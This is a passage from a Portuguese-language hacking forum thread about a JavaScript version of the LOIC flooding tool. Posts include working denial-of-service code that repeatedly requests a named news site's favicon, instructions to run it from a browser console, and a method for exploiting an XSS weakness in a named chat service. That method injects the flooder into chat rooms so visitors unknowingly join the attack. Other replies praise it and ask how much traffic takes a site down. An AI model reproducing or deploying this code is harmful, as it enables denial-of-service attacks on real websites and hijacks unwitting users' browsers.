Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

LOIC em JavaScript

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #16
    como faço para usar isso ?

    Comment


    • Font Size
      #17
      Muito bom, agora se funciona eu não sei eu ja usei outros hospedados e achei q não fazia diferença alguma quando eu atacava =/ mais tbem minha net é só de 1mb

      Comment


      • Font Size
        #18
        Usar sozinho, no próprio PC, é o mesmo que abrir o próprio Loic binário e (tentar) atacar.
        Ele não usa o poder do servidor, e sim do usuário. Porém, com algumas modificações, é possível fazer com que o usuário ataque o alvo sem que esteja ciente, somente ao visitar a página.
        Este material pode ser compartilhado, desde que os devidos créditos sejam dados.



        Notify-list · Twitter · Blog

        Nova lei: Invadir computadores protegidos é crime.
        Lógica: Se eu invadi, não é protegido. Logo, não é crime :-)

        Comment


        • Font Size
          #19
          Bom estive analisando o código e confirmo que ele não funciona
          pois é só visual e não possui poder nenhum
          podem testar cliquem em começar ataque sem nenhuma url definida
          a contagem vai começar do mesmo jeito

          Comment


          • Font Size
            #20
            Bom estive analisando o código e confirmo que ele não funciona
            pois é só visual e não possui poder nenhum
            podem testar cliquem em começar ataque sem nenhuma url definida
            a contagem vai começar do mesmo jeito
            Manja JavaScript mesmo, amigo?
            Código HTML:
                                var rID =Number(new Date());
                                var img = new Image();
                                img.onerror = function () { onFail(rID); };
                                img.onabort = function () { onFail(rID); };
                                img.onload = function () { onSuccess(rID); }; // TODO: it may never happen if target URL is not an image... // but probably can be fixed with different methods
            					
            					img.setAttribute("src", targetURL + "?id=" + rID + "&msg=" + messageNode.value);
            Eu confirmo que funciona sim. Duvida?


            =]
            Este material pode ser compartilhado, desde que os devidos créditos sejam dados.



            Notify-list · Twitter · Blog

            Nova lei: Invadir computadores protegidos é crime.
            Lógica: Se eu invadi, não é protegido. Logo, não é crime :-)

            Comment


            • Font Size
              #21
              Se alguém quiser um formato compacto e ter noção de como isso poderia ser usado no XSS, aqui vai uma versão compacta:

              Código:
              function f_(t_) {var r_=Number(new Date());var img = new Image();img.setAttribute("src",t_+"?d="+r_);};setInterval("f_('http://www.uol.com.br/favicon.ico')",50);
              O que ele faz basicamente é rodar uma função infinitas vezes, e cada vez que roda, ele cria um img e atribui o atributo src desse img como o site alvo.

              pra usar é so colar isso no console do Chrome, no exemplo ele flooda o uol, pegando o icone do uol, a um tempo de 50 milisegundos.

              Acredito que a cada nova requisição do sistema, o servidor precisa criar novas estruturas e tal, portanto EU ACHO, intuitivamente que é mais interessante para o atacante que as mensagens de entrega do servidor sejam curtas e que a ocupação com o servidor seja mais em receber mais entradas (pra criar mais chamadas de sistema e etc), mas isso é so uma intuição. Exatamente por isso que acredito que seja mais inteligente pegar a menor imagem possível do servidor, ou seja, pega o ícone favicon.ico que todo servidor geralmente tem.

              Um sistema que pode ser usado para usar esse LOIC é o Chat do T3rra, uma sala cheia do Chat do t3rra tem 50 pessoas.
              Existe uma vulnerabilidade do chat do t3rra que permite você enviar esse LOIC.
              Código:
              http://s1.trrsf.com.br/chat_client_stf/prod/_js/chatClient_compressed.js
              nesse arquivo do t3rra acima, existe uma linha assim
              valMessage = font + _strEscape(initialText + " " + valMessage + " " + finalText) + fontClose;
              Basta que você retire o _strEscape, ficando assim:
              valMessage = font + (initialText + " " + valMessage + " " + finalText) + fontClose;
              e pronto, você pode injetar o LOIC em várias salas e fazer os usuarios de zumbis.

              Portanto bastaria que alguém injetasse assim:
              Código:
              <script>function f_(t_) {var r_=Number(new Date());var img = new Image();img.setAttribute("src",t_+"?d="+r_);};setInterval("f_('http://www.uol.com.br/favicon.ico')",50);</script>
              nas salas (considerando que você ja tenha modificado seu chatClient_compressed.js)

              Escrevi isso para mostrar como que o XSS pode ser usado em conjunto com o LOIC para derrubar sistemas, espero que seja útil.

              Comment


              • Font Size
                #22
                Legal Okal,testado e aprovado cara.Vc é demais.

                Comment


                • Font Size
                  #23
                  Alguém já testou sabe se funciona!!

                  Comment


                  • Font Size
                    #24
                    Vlw parece funcionar

                    Comment


                    • Font Size
                      #25
                      O código faz várias requisições ajax ao servidor, não é? Fazendo o servidor - no momento em que as requisições ultrapassarem sua capacidade de processamento - "cair".

                      Obrigado por compartilhar.


                      You say yes, I say no
                      You say stop but I say go, go, go
                      You say goodbye and I say hello


                      Comment


                      • Font Size
                        #26
                        mto bom veyy

                        Comment


                        • Font Size
                          #27
                          muito legal,mas quantos pacotes seria necessario para derrubar um site fraco ou quantos kbts ou giga ou mb seria necessario?
                          sigpic
                          Cedo ou tarde, você vai aprender, assim como eu aprendi, que existe uma diferença entre CONHECER o caminho e TRILHAR o caminho.

                          Comment

                          X
                          Working...
                          X